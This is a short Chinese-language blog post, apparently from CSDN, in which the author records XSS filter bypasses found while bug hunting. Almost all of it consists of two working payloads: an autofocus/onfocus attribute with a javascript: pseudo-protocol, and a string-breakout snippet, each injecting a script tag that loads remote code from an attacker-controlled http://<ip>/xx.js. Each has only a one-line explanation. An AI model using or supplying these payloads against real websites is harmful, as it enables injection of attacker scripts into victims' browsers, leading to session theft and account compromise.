版权声明:本文为博主原创文章,转载请注明出处! https://blog.csdn.net/qq_37964989/article/details/89341232
记录挖洞过程中所遇到的XSS绕过
1. 过滤了<>尖括号:
//原理:利用html以及js伪协议,当用户打开页面缓冲页面会自动获取焦点,从而触发js代码生成script标签,达到目的。
autofocus onfocus=location="javasCript:s=document.createElement("script");s.src="http://<ip>/xx.js"; document.body.appendChild(s);"
2. 漏洞已经在JS代码中,但是过滤了<>尖括号:
//原理:利用js代码创建新script标签,引入外接js文件,达到目的。
';s=document.createElement("script");s.src="http://<ip>/xx.js";document.body.appendChild(s);"
后续继续补充。